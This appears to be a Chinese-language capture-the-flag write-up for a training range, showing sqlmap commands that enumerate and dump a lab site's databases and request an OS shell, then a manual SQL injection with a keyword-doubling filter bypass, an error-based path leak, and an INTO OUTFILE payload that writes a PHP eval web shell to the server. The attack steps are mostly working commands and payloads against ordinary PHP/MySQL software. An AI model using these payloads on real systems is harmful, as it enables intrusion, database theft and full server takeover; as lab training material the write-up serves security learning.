尤里的复仇II 回归
尤里的复仇II 归来
- sqlmap尝鲜题
- sql-注入绕过防护getshell
sqlmap尝鲜题
Tips:
在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松……
很简单的啦,一跑就出来啦
传送门
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --os-shell//控制目标服务器
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --flush--session//刷新会话文件
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --batch//默认行为
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9* //*指定注入
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9* --dump-all//下载所有数据
ua --random-agent --risk3 --level3 -m批量操作
step1:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --batch//测试是否存在注入
step2:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -current-db --batch//查询当前数据库
step2:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --dbs //列出所有数据库
step3:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" --tables --batch//查询当前数据库中的所有表
step4:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" --columns --batch//查询指定库中指定表的所有列(字段)
step5:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" -C "flag" --dump --batch//打印出指定数据
sql-注入绕过防护getshell
Tips:
这天,在朋友的介绍下,他受邀测试了某集团的网站,在签完授权合同后,他平复下激动的心情,找到漏洞所在点,祭出神器,结果……
他发现有拦截,于是开始放下工具,学习如何绕狗……
最终,他成功完成了这次任务
一个基础的绕过,感受下绕过的逻辑
传送门
进入后台http://rhiq8003.ia.aqlab.cn/bees/admin/
登入栏存在post传参,于是在登入页面输入判断回显点
' order by 6 -- g
因为有过滤所以再输入
' a and nd un union ion seselectlect 1,2,3,4,5 -- g
发现
有点回显点不能看见,换种方式
知道网站目录
' a and nd updatexml(1,concat(0x21,@@basedir),1) -- a
上传木马
1' un union ion seselectlect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile 'D:/phpStudy/WWW/bees/shell.php' -- a
<?php @eval($_POST[cmd]);?>
上传成功
用菜刀连接
找flag
flag_{axdeDaf}
尤里的复仇II 回归相关推荐
- 尤里的复仇II 回归【7题】
尤里的复仇II 回归[7题] 渗透第一步-信息收集 1 渗透第一步-信息收集 2 基础环境搭建 sqlmap尝鲜题 sql-注入绕过防护getshell awd攻防靶场-fuzz乱拳打死老师傅 归来- ...
- 封神台-尤里的复仇II 回归sql-注入绕过防护getshell
http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz 直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描 1.在用户名处加上' ...
- 尤里复仇退出界面_红色警戒2、尤里的复仇win10卡死、分辨率太大、黑屏问题多种解决方法(已测)...
Windows 10如约而至,用户在尝试新系统新感觉体验的同时,红色警戒(红色警戒2尤里的复仇,以下简称YR)--这款老游戏的命运又会如何呢?相信大家现在最关心的是:Windows 10到底能不能正常 ...
- 红警2尤里的复仇中文完整PC版
[红色警戒2尤里的复仇]还记得在<红色警戒2>中那个超人尤里吗?这次在资料片<红色警戒2尤里的复仇>中他将成为一军的领袖,与同盟军对抗,野心勃勃的尤里利用自身拥有的心灵控制能力 ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
[封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...
- 封神台-第二章 尤里的复仇
封神台-第二章 尤里的复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+b ...
- 封神台-尤里的复仇Ⅰ
靶场链接:https://hack.zkaq.cn/ 文章目录 前言 四.为了更多的权限!留言板! 五.进击!拿到Web最高权限! 总结 前言 本来打算把尤里的复仇都做了,做到六就卡住了,不想做了,以 ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳 一二三四五六章
[封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 文章目录 [封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 第一章:为了女神小芳 SQL注入攻击原理实战演练 第二章: ...
- 尤里复仇退出界面_win7系统下红警2尤里的复仇如何改成窗口化运行
红警2尤里的复仇是一款备受玩家喜爱的游戏之一,然而在玩游戏过程中,有时候想要游戏截图,却发现截图效果很差,就想要给红警2尤里的复仇改成窗口化运行,这样就比较好看多了,那么要怎么操作呢,本教程就给大家分 ...
最新文章
- nodejs+express整合kindEditor实现图片上传
- MyBatis-动态SQL
- 开启mysql慢查询日志,不重启数据库的方法
- [NLP] 相对位置编码(二) Relative Positional Encodings - Transformer-XL
- 小鱼的航程(改进版)(洛谷-P1424)
- linux给目录加裸设备磁盘,Linux添加裸设备空间(Redhat)
- mybatis-plus 逻辑删除
- LAMP-各PHP加速器性能剖析
- UDP Socket编程
- Python学习笔记——cmd提示pip不是内部或外部命令解决方法
- 生成项目有roslyn_Roslyn的代码生成:UML的骨架类
- 电容式触摸感应按键解决方案(转载)
- 程序员如何让自己的技术能力突飞猛进?
- win10启动虚拟机蓝屏的一种解决方法
- python统计英文单词个数_统计英文单词的个数的python代码 及 字符串分割
- 什么是DataOps?难道DataOps只是面向Data 的Ops吗?
- iphone开发笔记和技巧总结
- 各品牌网络监控摄像头RTSP地址查询
- php正则取出后不保留左右,PHP 正则 如何匹配不出现某段字符串的写法!(保留备份)...
- python用print输出不同颜色字体